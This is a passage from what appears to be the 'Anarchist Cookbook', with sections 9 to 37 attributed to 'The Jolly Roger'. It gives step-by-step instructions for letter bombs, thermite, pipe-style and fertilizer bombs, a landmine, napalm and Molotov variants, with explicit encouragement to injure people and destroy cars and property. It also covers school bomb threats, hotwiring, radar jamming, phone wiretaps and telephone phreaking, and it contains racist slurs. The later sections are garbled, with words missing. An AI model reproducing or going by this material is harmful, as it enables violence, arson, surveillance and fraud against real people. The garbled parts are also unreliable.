person, 976 numbers galore, even harassing the operator at no risk to you! Think
of it as walking into an enemies house, and
using their phone to your heart's content.
9. How to make a CO² bomb by the Jolly Roger
You will have to use up the cartridge first by either shooting it or whatever.
With a nail, force a hole bigger so as to allow the powder and wick to fit in
easily. Fill the cartridge with black powder and
pack it in there real good by tapping the bottom of the cartridge on a hard
surface (I said TAP not SLAM!). Insert a fuse. I recommend a good water-proof
cannon fuse, or an m-80 type fuse,
but firecracker fuses work, if you can run like a black man runs from the cops
after raping a white girl.) Now, light it and run like hell! It does wonders for
a row of mailboxes (like the ones in apartment
complexes), a car (place under the gas tank), a picture window (place on window
sill), a phone booth (place right under the phone), or any other devious place.
This thing throws shrapnel, and can
make quit a mess!!
10. Thermite II by Jolly Roger
Thermite is nasty shit. Here is a good and easy way to make it. The first step
is to get some iron-oxide (which is RUST!). Here is a good way to make large
quantities in a short time:
· Get a DC converter like the one used on a train set. Cut the connector off,
separate the wires, and strip them both.
· Now you need a jar of water with a tablespoon or so of sodium chloride (which
is SALT!) added to it. This makes the water conductive.
· Now insert both wires into the mixture (I am assuming you plugged the
converter in...) and let them sit for five minutes. One of them will start
bubbling more than the other. This is the
POSITIVE(+) wire. If you do not do this test right, the final product will be
the opposite (chemically) of rust, which is RUST ACID. You have no use for this
here (although it IS useful!).
· Anyway, put the nail tied to the positive wire into the jar. Now put the
negative wire in the other end. Now let it sit overnight and in the morning
scrape the rust off of the nail & repeat until
you got a bunch of rust on the bottom of the glass. Be generous with your rust
collection. If you are going through the trouble of making thermite, you might
as well make a lot, right?
· Now remove the excess water and pour the crusty solution onto a cookie sheet.
Dry it in the sun for a few hours, or inside overnight. It should be an
orange-brown color (although I have
seen it in many different colors! Sometimes the color gets fucked up, what can I
say... but it is still iron oxide!)
· Crush the rust into a fine powder and heat it in a cast-iron pot until it is
red. Now mix the pure iron oxide with pure aluminum filings which can be bought
or filed down by hand from an
aluminum tube or bar. The ratio or iron oxide to aluminum is 8 grams to 3 grams.
· Congrats! You have just made THERMITE! Now, to light it...
· Thermite requires a LOT of heat (more than a blow torch!) to ignite. However,
magnesium ribbon (which is sort of hard to find.. call around) will do the
trick. It takes the heat from the
burning magnesium to light the thermite.
· Now when you see your victim's car, pour a fifty-cent sized pile onto his
hood, stick the ribbon in it, and light the ribbon with the blow torch. Now
chuckle as you watch it burn through the
hood, the block, the axle, and the pavement. BE CAREFUL! The ideal mixtures can
vaporize CARBON STEEL! Another idea is to use thermite to get into pay phone
cash boxes.
11. Touch Explosives by the Jolly Roger
This is sort of a mild explosive, but it can be quite dangerous in large
quantities. To make touch explosive (such as that found in a snap-n-pop, but
more powerful), use this recipe:
· Mix iodine crystals into ammonia until the iodine crystals will not dissolve
into the ammonia anymore. Pour off the excess ammonia and dry out the crystals
on a baking sheet the same way
as you dried the thermite (in other words, just let it sit overnight!).
· Be careful now because these crystals are now your touch explosive. Carefully
wrap a bunch in paper (I mean carefully! Friction sets 'em off!) and throw them
around.. pretty loud, huh?
They are fun to put on someone's chair. Add a small fish sinker to them and they
can be thrown a long distance (good for crowds, football games, concerts, etc.)
12. Letter Bombs by The Jolly Roger
· You will first have to make a mild version of thermite. Use my recipe, but
substitute iron fillings for rust.
· Mix the iron with aluminum fillings in a ratio of 75% aluminum to 25% iron.
This mixture will burn violently in a closed space (such as an envelope). This
bring us to our next ingredient...
· Go to the post office and buy an insulated (padded) envelope. You know, the
type that is double layered. Separate the layers and place the mild thermite in
the main section, where the letter
would go. Then place magnesium powder in the outer layer. There is your bomb!!
· Now to light it... this is the tricky part and hard to explain. Just keep
experimenting until you get something that works. The fuse is just that touch
explosive I have told you about in another
one of my anarchy files. You might want to wrap it like a long cigarette and
then place it at the top of the envelope in the outer layer (on top of the
powdered magnesium). When the touch explosive is
torn or even squeezed hard it will ignite the powdered magnesium (sort of a
flash light) and then it will burn the mild thermite. If the thermite didn't
blow up, it would at least burn the fuck out of your
enemy (it does wonders on human flesh!).
13. Paint Bombs by The Jolly Roger
To make a pain bomb you simply need a metal pain can with a refastenable lid, a
nice bright color paint (green, pink, purple, or some gross color is perfect!),
and a quantity of dry ice. Place the paint in
the can and then drop the dry ice in. Quickly place the top on and then run like
hell! With some testing you can time this to a science. It depends on the ratio
of dry ice to paint to the size of the can to
how full it is. If you are really pissed off at someone, you could place it on
their doorstep, knock on the door, and then run!! Paint will fly all over the
place!!
14. Ways to send a car to Hell by The Jolly Roger
There are 1001 ways to destroy a car but I am going to cover only the ones that
are the most fun (for you), the most destructive (for them), and the hardest to
trace (for the cops).
· Place thermite on the hood, light it, and watch it burn all the way through
the pavement!
· Tape a CO² bomb to the hood, axle, gas tank, wheel, muffler, etc.
· Put a tampon, dirt, sugar (this one is good!), a ping pong ball, or just about
anything that will dissolve in the gas tank.
· Put potatoes, rocks, bananas, or anything that will fit, into the tailpipe.
Use a broom handle to stuff 'em up into the tailpipe.
· Put a long rag into the gas tank and light it...
· Steal a key, copy it, replace it, and then steal the stereo.
· Break into the car. Cut a thin metal ruler into a shape like this:
Slide it into the outside window and keep pulling it back up until you catch the
lock cable which should unlock the door. This device is also called a SLIM JIM.
Now get the stereo, equalizer, radar
detector, etc. Now destroy the inside. (A sharp knife does wonders on the
seats!)
15. Do you hate school? by The Jolly Roger
· One of my favorites for getting out of a class or two is to call in a bomb
threat. Tell 'em that it is in a locker. Then they have to check them all,
whilst you can slip away for an hour or two.
You can even place a fake bomb (in any locker but YOURS!). They might cancel
school for a week while they investigate (of course, you will probably have to
make it up in the summer).
· Get some pure potassium or pure sodium, put it in a capsule, and flush it down
the toilet (smells awful! Stinks up the whole school!).
· Use a smoke grenade in the hallway.
· Steal the computer passwords & keys. Or steal the 80 column cards inside if
they are (gag) IBM.
· Make friends with student assistants and have them change your grades when the
teachers hand in their bubble sheets for the report cards.
· Spit your gum out on the carpet in the library or whatever and grind it into
the carpet. Watch the janitors cry!
· Draw on lockers or spraypaint on the building that the principal is a fascist.
· Stick a potato in the tailpipe of the principal's car.
· USE YOUR IMAGINATION!
16. Phone related vandalism by the Jolly Roger
If you live where there are underground lines then you will be able to ruin
someone's phone life very easily. All you must do is go to their house and find
the green junction box that interfaces their line
(and possibly some others in the neighborhood) with the major lines. These can
be found just about anywhere but they are usually underneath the nearest phone
pole. Take a socket wrench and loosen
the nut on the right. Then just take clippers or a sledge hammer or a bomb and
destroy the insides and pull up their phone cable. Now cut it into segments so
it can't be fixed but must be replaced
(There is a week's worth of work for 'em!!)
17. Highway radar jamming by The Jolly Roger
Most drivers wanting to make better time on the open road will invest in one of
those expensive radar detectors. However, this device will not work against a
gun type radar unit in which the radar
signal is not present until the cop has your car in his sights and pulls the
trigger. Then it is TOO LATE for you to slow down. A better method is to
continuously jam any signal with a radar signal of your
own. I have tested this idea with the cooperation of a local cop and found that
his unit reads random numbers when my car approached him. It is suprisingly easy
to make a low power radar transmitter.
A nifty little semiconductor called a Gunn Diode will generate microwaves when
supplied with the 5 to 10 volt DC and enclosed in the correct size cavity
(resonator). An 8 to 3 terminal regulator can be
used to get this voltage from a car's 12v system. However, the correct
construction and tuning of the cavity is difficult without good microwave
measurement equipment. Police radars commonly
operate on the K band at 22 GHz. Or more often on the X band at 10½25 GHz. most
microwave intruder alarms and motion detectors (mounted over automatic doors in
supermarkets & banks, etc.)
contain a Gunn type transmitter/receiver combination that transmits about 10
kilowatts at 10½25 GHz. These units work perfectly as jammers. If you cannot get
one locally, write to Microwave
Associates in Burlington, Massachusetts and ask them for info on 'Gunnplexers'
for ham radio use. When you get the unit it may be mounted in a plastic box on
the dash or in a weather-proof enclosure
behind the PLASTIC grille. Switch on the power when on an open highway. The unit
will not jam radar to the side or behind the car so don't go speeding past the
radar trap. An interesting phenomena
you will notice is that the drivers who are in front of you who are using
detectors will hit their brakes as you approach large metal signs and bridges.
Your signal is bouncing off of these objects and
triggering their radar detectors!
PS If you are interested in this sort of thing, get a copy of POPULAR
COMMUNICATIONS. The ads in there tell you where you can get all kinds of info on
all kinds of neat equipment for all kinds of
neat things!
18. Smoke Bombs by the Jolly Roger
Here is the recipe for one hell of a smoke bomb!
4 parts sugar
6 parts potassium nitrate (Salt Peter)
Heat this mixture over a LOW flame until it melts, stirring well. Pour it into a
future container and, before it solidifies, imbed a few matches into the mixture
to use as fuses. One pound of this stuff will fill
up a whole block with thick, white smoke!
19. Mail Box Bombs by the Jolly Roger
1. Two liter bottle of chlorine (must contain sodium hypochlorate)
2. Small amount of sugar
3. Small amount of water
Mix all three of these in equal amounts to fill about 1/10 of the bottle. Screw
on the lid and place in a mailbox. It's hard to believe that such a small
explosion will literally rip the mailbox in half and send
it 20 feet into the air! Be careful doing this, though, because if you are
caught, it is not up to the person whose mailbox you blew up to press charges.
It is up to the city.
20. The easiest way to hot-wire cars by the Jolly Roger
Get in the car. Look under the dash. If it's enclosed, forget it unless you want
to cut through it. If you do, do it near the ignition. Once you get behind or
near the ignition look for two red wires. In older
cars red was the standard color, if not, look for two matched pairs. When you
find them, cross them and take off!
21. How to make Napalm by the Jolly Roger
· Pour some gas into an old bowl, or some kind of container.
· Get some styrofoam and put it in the gas, until the gas won't eat anymore. You
should have a sticky syrup.
· Put it on the end of something (don't touch it!!). The unused stuff lasts a
long time!
22. How to make a fertilizer bomb by The Jolly Roger
Ingredients:
· Newspaper
· Fertilizer (the chemical kind, GREEN THUMB or ORCHO)
· Cotton
· Diesel fuel
Make a pouch out of the newspaper and put some fertilizer in it. Then put cotton
on top. Soak the cotton with fuel. Then light and run like you have never ran
before! This blows up 500 square feet so
don't do it in an alley!!
23. Tennis Ball Bombs by The Jolly Roger
Ingredients:
· Strike anywhere matches
· A tennis ball
· A nice sharp knife
· Duct tape
Break a ton of matchheads off. Then cut a SMALL hole in the tennis ball. Stuff
all of the matchheads into the ball, until you can't fit any more in. Then tape
over it with duct tape. Make sure it is real
nice and tight! Then, when you see a geek walking down the street, give it a
good throw. He will have a blast!!
24. Diskette Bombs by The Jolly Roger
You need:
· A disk
· Scissors
· White or blue kitchen matches (they MUST be these colors!)
· Clear nail polish
1. Carefully open up the diskette (3½" disks are best for this!)
2. Remove the cotton covering from the inside.
3. Scrape a lot of match powder into a bowl (use a wooden scraper, metal might
spark the matchpowder!)
4. After you have a lot, spread it evenly on the disk.
5. Using the nail polish, spread it over the match mixture
6. Let it dry
7. Carefully put the diskette back together and use the nail polish to seal it
shut on the inside (where it came apart).
When that disk is in a drive, the drive head attempts to read the disk, which
causes a small fire (ENOUGH HEAT TO MELT THE DISK DRIVE AND FUCK THE HEAD UP!!).
Let the fuckhead
try and fix THAT!!!
25. Unlisted Phone Numbers by The Jolly Roger
There are a couple of different ways of doing this. Let's see if this one will
help: Every city has one or more offices dedicated to assigning numbers to the
telephone wire pairs. These offices are called
DPAC offices and are available to service reps who are installing or repairing
phones. To get the DPAC number, a service rep would call the customer service
number for billing information in the town
that the number is located in that he is trying to get the unlisted number of.
(Got that?) The conversation would go something like this: "Hi, Amarillo, this
is Joe from Anytown business office, I need the
DPAC number for the south side of town." This info is usually passed out with no
problems, so... if the first person you call doesn't have it, try another.
REMEMBER, no one has ANY IDEA who the
hell you are when you are talking on the phone, so you can be anyone you damn
well please! When you call the DPAC number, just tell them that you need a
listing for either the address that you have,
or the name. DPAC DOES NOT SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!! Also,
if you're going to make a habit of chasing numbers down, you might want to check
into
getting a criss-cross directory, which lists phone numbers by their addresses.
It costs a couple hundred bucks, but it is well worth it if you have to chase
more than one or two numbers down!
26. Fuses by The Jolly Roger
You would be surprised how many files are out there that use what falls under
the category of a "fuse." They assume that you just have a few lying around, or
know where to get them. Well, in some
parts of the country, fuses are extremely hard to come by... so this file tells
you how to make your own. Both fuses presented here are fairly simple to make,
and are fairly reliable.
SLOW BURNING FUSE - 2 inches per minute
Materials needed:
· Cotton string or 3 shoelaces
· Potassium Nitrate or Potassium Chlorate
· Granulated sugar
Procedure:
1. Wash the cotton string or shoelaces in HOT soapy water, then rinse with fresh
water
2. Mix the following together in a glass bowl:
· 1 part potassium nitrate or potassium chlorate
· 1 part granulated sugar
· 2 parts hot water
3. Soak strings or shoelaces in this solution
4. Twist/braid 3 strands together and allow them to dry
5. Check the burn rate to see how long it actually takes!!
FAST BURNING FUSE - 40 inches per minute
Materials needed:
· Soft cotton string
· Fine black powder (empty a few shotgun shells!)
· Shallow dish or pan
Procedure:
1. Moisten powder to form a paste.
2. Twist/braid 3 strands of cotton together.
3. Rub paste into string and allow to dry.
4. Check the burn rate!!!
27. How to make Potassium Nitrate by The Jolly Roger
Potassium Nitrate is an ingredient in making fuses, among other things. Here is
how you make it:
Materials needed:
· 3½ gallons of nitrate bearing earth or other material
· ½ cup of wood ashes
· Bucket or other similar container about 4-5 gallons in volume
· 2 pieces of finely woven cloth, each a bit bigger than the bottom of the
bucket
· Shallow dish or pan at least as large in diameter as the bucket
· Shallow, heat resistant container
· 2 gallons of water
· Something to punch holes in the bottom of the bucket
· 1 gallon of any type of alcohol
· A heat source
· Paper & tape
Procedure:
1. Punch holes on the inside bottom of the bucket, so that the metal is
"puckered" outward from the bottom.
2. Spread cloth over the holes from the bottom.
3. Place wood ashes on the cloth. Spread it out so that it covers the entire
cloth and has about the same thickness.
4. Place 2nd cloth on top of the wood ashes.
5. Place the dirt or other material in the bucket.
6. Place the bucket over the shallow container. NOTE: It may need support on the
bottom so that the holes on the bottom are not blocked.
7. Boil water and pour it over the earth very slowly. Do NOT pour it all at
once, as this will clog the filter on the bottom.
8. Allow water to run through holes into the shallow dish on the bottom.
9. Be sure that the water goes through ALL of the earth!
10. Allow water in dish to cool for an hour or so.
11. Carefully drain the liquid in the dish away, and discard the sludge in the
bottom.
12. Boil this liquid over a fire for at least two hours. Small grains of salt
will form - scoop these out with the paper as they form.
13. When the liquid has boiled down to ½ its original volume let it sit.
14. After ½ hour, add equal volume of the alcohol; when this mixture is poured
through paper, small white crystals appear. This is the potassium nitrate.
Purification:
1. Redissolve crystals in small amount of boiling water.
2. Remove any crystals that appear.
3. Pour through improvised filter then heat concentrated solution to dryness.
4. Spread out crystals and allow to dry.
28. Exploding Lightbulbs by The Jolly Roger
Materials needed:
· Lightbulb (100w)
· Socket (duh...)
· ¼ cup soap chips
· Blackpowder! (open some shotgun shells!)
· ¼ cup kerosene or gasoline
· Adhesive tape
· Lighter or small blowtorch
· Glue
Procedure for a simple exploding lightbulb:
1. Drill a small hole in the top of the bulb near the threads!
2. Carefully pour the blackpowder into the hole. Use enough so that it touches
the filament!
3. Insert into socket as normal (make sure the light is off or else YOU will be
the victim!!)
4. Get the hell out!!
Procedure for a Napalm Bulb:
1. Heat kerosene/gasoline in a double boiler.
2. Melt soap chips, stirring slowly.
3. Put somewhere and allow to cool.
4. Heat the threads of the bulb VERY carefully to melt the glue. Remove threads,
slowly drawing out the filament. Do NOT break the cheap electrical igniters
and/or the filament or this won't
work!!
5. Pour the liquid into the bulb, and slowly lower the filament back down into
the bulb. Make sure the filament is dipped into the fluid.
6. Re-glue the threads back on. Insert it into a socket frequently used by the
victim and get the hell out!!
When the victim flips the switch, he will be in for a BIG surprise!
29. Under water igniters by The Jolly Roger
Materials needed:
· Pack of 10 silicon diodes. (Available at Radio Shack. You will know you got
the right ones if they are very, very small glass objects!)
· Pack of matches
· 1 candle
Procedure:
1. Light the candle and allow a pool of molten wax to form in the top.
2. Take a single match and hold the glass part of a single diode against the
head. Bend the diode pins around the matchhead so that one wraps in an upward
direction and then sticks out to the
side. Do the same with the other wire, but in a downward direction. The diodes
should now be hugging the matchhead, but its wires MUST NOT TOUCH EACH OTHER!
3. Dip the matchhead in wax to give it a water-proof coat. These work underwater
4. Repeat to make as many as you want.
How to use them:
When these little dudes are hooked across a 6v battery, the diode reaches what
is called breakdown voltage. When most electrical components reach this voltage,
they usually produce great amounts
of heat and light, while quickly melting into a little blob. This heat is enough
to ignite a matchhead. These are recommended for use underwater, where most
other igniters refuse to work.
30. Home-brew blast cannon by The Jolly Roger
Materials needed:
· 1 plastic drain pipe, 3 feet long, at least 3 ½ inches in diameter.
· 1 smaller plastic pipe, about 6 inches long, 2 inches in diameter.
· 1 large lighter, with fluid refills (this gobbles it up!)
· 1 pipe cap to fit the large pipe, 1 pipe cap to fit the small pipe.
· 5 feet of bellwire.
· 1 SPST rocker switch.
· 16v polaroid pot-a-pulse battery.
· 15v relay (get this at Radio Shack).
· Electrical Tape.
· One free afternoon.
Procedure:
· Cut the bell wire into three equal pieces, and strip the ends.
· Cut a hole in the side of the large pipe, the same diameter as the small pipe.
Thread the hole and one end of the small pipe. They should screw together
easily.
· Take a piece of scrap metal, and bend it into an "L" shape, then attach it to
the level on the lighter:
/------------------------gas switch is here
V
/------
!lighter!!<---metal lever!!
· Now, every time you pull the 'trigger' gas should flow freely from the
lighter. You may need to enlarge the 'gas port' on your lighter, if you wish to
be able to fire more rapidly.
· Connect two wires to the two posts on the switch.
· Cut two holes in the side of the smaller tube, one for the switch on the
bottom, and one for the metal piece on the top. Then, mount the switch in the
bottom, running the wires up and out of
the top.
· Mount the lighter/trigger in the top. Now the switch should rock easily, and
the trigger should cause the lighter to pour out gas. Re-screw the smaller tube
into the larger one, hold down the
trigger a bit, let it go, and throw a match in there. If all goes well, you
should hear a nice big 'THUD!'
· Get a hold of the relay, and take off the top.
1---------------
v/
2--------------/<--the center object is the metal finger inside the relay
3
cc-------------/
oo----------------4
ii
ll----------------5
· Connect (1) to one of the wires coming from the switch. Connect (2) to (4),
and connect (5) to one side of the battery. Connect the remaining wire from the
switch to the other side of the
battery. Now you should be able to get the relay to make a little 'buzzing'
sound when you flip the switch and you should see some tiny little sparks.
· Now, carefully mount the relay on the inside of the large pipe, towards the
back. Screw on the smaller pipe, tape the battery to the side of the cannon
barrel (yes, but looks aren't
everything!)
· You should now be able to let a little gas into the barrel and set it off by
flipping the switch.
· Put the cap on the back end of the large pipe VERY SECURELY. You are now ready
for the first trial-run!
To Test:
Put something very, very large into the barrel, just so that it fits 'just
right'. Now, find a strong guy (the recoil will probably knock you on your ass
if you aren't careful!). Put on a shoulderpad, earmuffs,
and possibly some other protective clothing (trust the Jolly Roger! You are
going to need it!). Hold the
trigger down for 30 seconds, hold on tight, and hit the switch. With luck and
the proper adjustments, you should be able to put a frozen orange through ¼ or
plywood at 25 feet.
31. Chemical Equivalency list by The Jolly Roger
Acacia................................................................Gum Arabic
Acetic Acid..............................................................Vinegar
Aluminum Oxide............................................................Alumia
Aluminum Potassium Sulphate.................................................Alum
Aluminum Sulfate............................................................Alum
Ammonium Carbonate.....................................................Hartshorn
Ammonium Hydroxide.......................................................Ammonia
Ammonium Nitrate......................................................Salt Peter
Ammonium Oleate.....................................................Ammonia Soap
Amylacetate...........................................................Banana Oil
Barium Sulfide.........................................................Black Ash
Carbon Carbinate...........................................................Chalk
Carbontetrachloride...............................................Cleaning Fluid
Calcium Hypochloride............................................Bleaching Powder
Calcium Oxide...............................................................Lime
Calcium Sulfate.................................................Plaster of Paris
Carbonic Acid............................................................Seltzer
Cetyltrimethylammoniumbromide......................................Ammonium Salt
Ethylinedichloride...................................................Dutch Fluid
Ferric Oxide...........................................................Iron Rust
Furfuraldehyde..........................................................Bran Oil
Glucose...............................................................Corn Syrup
Graphite.............................................................Pencil Lead
Hydrochloric Acid..................................................Muriatic Acid
Hydrogen Peroxide.......................................................Peroxide
Lead Acetate.......................................................Sugar of Lead
Lead Tero-oxide.........................................................Red Lead
Magnesium Silicate..........................................................Talc
Magnesium Sulfate.....................................................Epsom Salt
Methylsalicylate................................................Winter Green Oil
Naphthalene............................................................Mothballs
Phenol.............................................................Carbolic Acid
Potassium Bicarbonate............................................Cream of Tarter
Potassium Chromium Sulfate............................................Chromealum
Potassium Nitrate.....................................................Salt Peter
Sodium Oxide................................................................Sand
Sodium Bicarbonate...................................................Baking Soda
Sodium Borate..............................................................Borax
Sodium Carbonate....................................................Washing Soda
Sodium Chloride.............................................................Salt
Sodium Hydroxide.............................................................Lye
Sodium Silicate............................................................Glass
Sodium Sulfate....................................................Glauber's Salt
Sodium Thiosulfate...........................................Photographer's Hypo
Sulfuric Acid.......................................................Battery Acid
Sucrose...............................................................Cane Sugar
Zinc Chloride.....................................................Tinner's Fluid
Zinc Sulfate.......................................................White Vitriol
32. Phone Taps by The Jolly Roger
Here is some info on phone taps. In this file is a schematic for a simple
wiretap & instructions for hooking up a small tape recorder control relay to the
phone line.
First, I will discuss taps a little. There are many different types of taps.
There are transmitters, wired taps, and induction taps to name a few. Wired and
wireless transmitters must be physically
connected to the line before they will do any good. Once a wireless tap is
connected to the line, it can transmit all conversations over a limited
reception range. The phones in the house can even be
modifies to pick up conversations in the room and transmit them too! These taps
are usually powered off of the phone line, but can have an external power
source. You can get more information on
these taps by getting an issue of Popular Communications and reading through the
ads. Wired taps, on the other hand, need no power source, but a wire must be run
from the line to the listener or to a
transmitter. There are obvious advantages of wireless taps over wired ones.
There is one type of wireless tap that looks like a normal telephone mike. All
you have to do is replace the original mike with
this and it will transmit all conversations! There is also an exotic type of
wired tap known as the 'Infinity Transmitter' or 'Harmonica Bug'. In order to
hook one of these, it must be installed inside the
phone. When someone calls the tapped phone & *before* it rings and blows a
whistle over the line, the transmitter picks up the phone via a relay. The mike
on the phone is activated so that the caller
can hear all of the conversations in the room. There is a sweep tone test at
415/BUG-1111 which can be used to detect one of these taps. If one of these is
on your line & the test # sends the correct
tone, you will hear a click. Induction taps have one big advantage over taps
that must be physically wired to the phone. They do not have to be touching the
phone in order to pick up the conversation.
They work on the same principle as the little suction-cup tape recorder mikes
that you can get at Radio Shack. Induction mikes can be hooked up to a
transmitter or be wired.
Here is an example of industrial espionage using the phone:
A salesman walks into an office & makes a phone call. He fakes the conversation,
but when he hangs up he slips some foam rubber cubes into the cradle. The called
party can still hear all conversations
in the room. When someone picks up the phone, the cubes fall away unnoticed.
A tap can also be used on a phone to overhear what your modem is doing when you
are war-dialing, hacking, or just plain calling a bbs.
Here is the schematic:
-------)!----)!(------------->
)!(
Cap ^ )!(
)!(
)!(
)!(
^^^^^---)!(------------->
^ 100K
!
! <Input
The 100K pot is used for volume. It should be on its highest (least resistance)
setting if you hook a speaker across output. but set resistance tape recorder or
amplifier. may find necessary to add
another 10 - 40K. capacitor around .47 MFD.'s only purpose prevent relay in
phone from tripping & thinking that have off of hook. audio output transformer
available at Radio Shack. (part #
273-138E input). red white wires go device. want experiment with best Hooking up
easy. Just one (usually red) end other loop around. This bypasses it. look like
this:
------^^^^^^^^^------------
---------
RELAY^^ #275-004 Shack works fine) think line tapped, first thing do physically
inspect yourself ESPECIALLY phones. can get mike replacements bug detectors
built in. However, I would not
trust them too much. easy wrong reading. more info:
BUGS AND ELECTRONIC SURVEILLANCE Desert Publications HOW AVOID EAVESDROPPING
PRIVACY INVASION. remember who from... might try Paladin Press.
33. make landmine by Jolly Roger
First, need push-button switch. Take connect nine volt battery connector solar
igniter (used launching model rockets). very thin piece stereo wire will usually
trick are desperate, recommend igniter.
nine-volt switch lead
switch-----------battery
\
|
explosive
Now (pipe bomb, m-80, CO² etc.) attaching fuse (seal scotch tape). dig hole;
deep enough cover all materials. about what direction your enemy coming plant
switch, leave button visible (not visible!).
3-5 feet away because there delay explosion depends short wick is, and, homemade
being used, burning speed. right... close enough.........
BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM!
34. different kind Molitov Cocktail
Here it:
1. coke bottle fill gasoline half full.
2. Cram cloth into neck nice tight.
3. chlorine tablet stuff there. going force tablets bigger than opening bottle.
4. suitable victim wing their direction. When hits pavement any surface hard
break it, mix..... BOOM!!!!!!
35. Systems Tutorial start off, we discuss dialing procedures domestic as well
international dialing. also telephone numbering plan.
North American Plan America, follows:
· 3 digit Area (NPA) code , i.e., 7 number consisting Central Office (CO) plus 4
station
These digits called network address destination code. format of: -----------
N*X NXX-XXXX
Where: N = a 2 9
* = the 0 1
X = a Codes
Check book separate listing found many bbs's. special (SAC's):
510 TWX (USA)
610 (Canada)
700 New Service
710
800 WATS
810
900 DIAL-IT Services
910 never cross state lines, therefore each must least exclusive NPA community
split line, CO numbers often interchangeable (i.e., dial same two codes). (Telex
II) consists 5 teletype-writer codes.
They owned Western Union. SAC reached via machines. run 110 baud (last checked!
most likely faster now!). Besides numbers, machines routed normal numbers.
always respond an answerback.
example, WU FYI (910) 279-5956. answerback MAWA don't machine, still send
messages using Easylink [800/325-4112]. However gonna hack way onto one!
700: currently AT&T call forwarding service. targeted towards salesmen run.
understand works,'ll explain example. Let say Joe Q. Salespig security he
chasing phreak country royally screwed
important COSMOS system. (700) 382-5968. Every time goes hotel (or SLEAZY
MOTEL), dials #, enters code, where staying. Now, his boss received some info,
382-5968 ring wherever last
programmed to. Neat, huh?
800: my favorites since allows toll free calls. INWARD (INWATS), Wide
Telecommunications familiar with. areas bands. 6 these. Band largest anywhere US
except terminated (that why companies
then state.) includes 48 contiguous states. down which states one. Therefore,
less people reach INWATS number.
Intrastate state) exchange 800-NX2-XXXX). NXX represent business located.
beginning 800-431 terminate NY CO. hunt series means tries allocated company
lines; busy, next number, etc.
minimum lines Travelnet uses series. (800) 521-8400, associated 8400; busy port,
customers billed hours calls made
OUTWATS (OUTWARD WATS): making outgoing only. Large use receive bulk-rate
discounts. cannot incoming calls, *XXX-XXXX even designated letter) dialed
unless box call. *XX identifies
type
Remember: + EXTENDER
900: nationwide taking television polls stuff. minute costs outrageous 50-85
cents additional 35-85 cents. lot revenue way! (900) 555-1212 out identify
switching routed. following reserved nationwide:
555 directory assistance
844 time. in!
936 weather 976
950 future
958 test
959
970 (temporary)
Also, ANI ringback regarded thus reserved. vary area. (unless blue box!). due
fact exchanges (000-199) contains sorts interesting shit such conference's,
operators,
950: exchange:
1000 SPC
1022 MCI Execunet
1033
1044 Allnet
1066 Lexitel
1088 SBS Skyline SCC (Specialized Common Carriers) fortress phones! probably
phased introduction Equal Access. Tests: include ANI, Ringback, various tests.
976: 976-1000 see listings
N11 codes:
----------
Bell trying phase these, exist areas.
011 prefix
211 coin refund operator
411
611 repair
811
911 EMERGENCY Dialing, world has been divided zones. call, dial: National
station-to-station directly Direct Distance (IDDD). varies digits, zone digit.
United Kingdom 44, boards contain
complete codes, give few: America (US, Canada,
20 Egypt
258 Mozambique
34 Spain
49 Germany
52 Mexico (southern portion) USSR
81 Japan
98 Iran (call hassle those bastards!) generally same. wanted House Switzerland
tell president numbered bank account overdrawn (it happens, know!). 00 (the
SWISS prefix), code), followed
202-456-1414 House. ask Georgy him bad news!) 87 Maritime mobile service,
calling ships:
871 Marisat (Atlantic) (Pacific)
872 (Indian) Switching:
------------------------ no. ESS perform duty ISC (Inter-nation Centers).
through "gateway cities are:
182 Plains,
183 York,
184 Pittsburgh, PA
185 Orlando, Fl
186 Oakland, CA
187 Denver,
188 18X routing overseas access (to further discussed boxes). signaling CCITT.
standard signaling.
OK.. now! read this, part file #36 cookbook!
36. II deal types hierarchy, equipment.
Operators ones discussed.
TSPS Operator: [(Traffic Position System) opposed Shitty Service] bitch bastard,
female liberationists there) having/her responsibilities: Obtaining billing
information card third
Identifying customer person-to-person acceptance charges collect happens
automatically recorded CAMA(Centralized Automatic Message Accounting) forwarded
local office. could caused
equipment failures (ANIF- Identification Failure) equipped CAMA (ONI-
Identification). once had failure happen me came said, FROM? curiosity, gave CO,
she thanked was connected conversation
appeared between frame man wife. started ringing party originally everyone
phreaked (excuse pun). immediately dropped dual conference! mess KNOWS from.
show 10-digit LED read-out (ANI
board). whether trace quite readily! DANGEROUS. assists ("0") operating
connecting question long within box. box, KP+NPA+121+ST help (Blue Boxing file).
NPA-555-1212. does readily know
unlisted exists certain listing. deaf teletypewriters. modem transfer BAUDOT
[(45½ baud). Apple Cat acoustic Atari 830 modem. Yea find... this.. around!)
conversation. is: 800-855-1155. Telex
abbreviations GA ahead. tend nicer talk longer regular operators. vulnerable
talked process "social engineering Chesire Catalyst put
Unfortunately, bullshitted while back DA offices handle TTY. Philadelphia
California. approx. each. TTY job
boring (based official "BIOC poll feel under-paid. actually request (sorry, no
fancy computers!) own KP+NPA+131+ST (MF).
CN operators: exactly opposite for. experience, op susceptible engineering.
possible bullshit NON-PUB name article cookbook info them.). assume fellow
employee. breakup resulted break-up few
policy changes/A.
INTERCEPT recordings disconnected changed. says, calling? foreign accent. lowest
lifeform. though from, waste verbally abuse little English anyway.
Incidentally, intelligent the: Mobile, Ship-to-Shore, Conference, Marine Verify,
Word", Rout Rate (KP+800+141+1212+ST), network.
Problems speak supervisor... better yet Group Chief (who ranking office)
equivalent Madame whorehouse. way, allow 4th digit, fun Tel. without rare,
though! 212-121-1111 Operator. Hierarchy
system), assigned class. five classes 5. class long-distance (Toll) switched 4,
3, 2, 4X intermediate point. digital unattended attached (known Remote Unit
(RSU)). chart list name, knowledge) America:
Abb Existing Regional Center RC 12 Sectional SC 67 Primary PC 230 TC 1,300
4P Point TP IP EO 19,000 RSU another, shortest route caller party. inter-office
trunks parties, move upward servicing (Class 4). sending office, sent (3).
high-usage
interoffice trunk groups, final; groups level. connected, re-order [120 IPM
(interruptions per minute) signal] signal. time, guys Operations shitting pants
dreaded Dreadlock (as seen TV!). note
connections tandem ring-around-the-rosy occurred history. cause endless
connection [a neat really screw network]. centers Canada interconnected. form
foundation entire them, listed below: Location
Dallas 214
Wayne, 215
Denver 4T 303
Regina 2SP1-4W 306
St. Louis 314
Rockdale, 404
Pittsburgh 4E 412
Montreal 4AETS 504
37. Basic Alliance Teleconferencing
Introduction: phile accessing, understanding Systems. sections printed out.
Alliance: independent general public conferencing rumors floating subsidiary
AT&T. Well, wrong. stated above, entirely company. sophisticated users once.
Number: exchange, localized, way. states,
residents direct. later chapter.
0-700-456-1000 (Chicago)
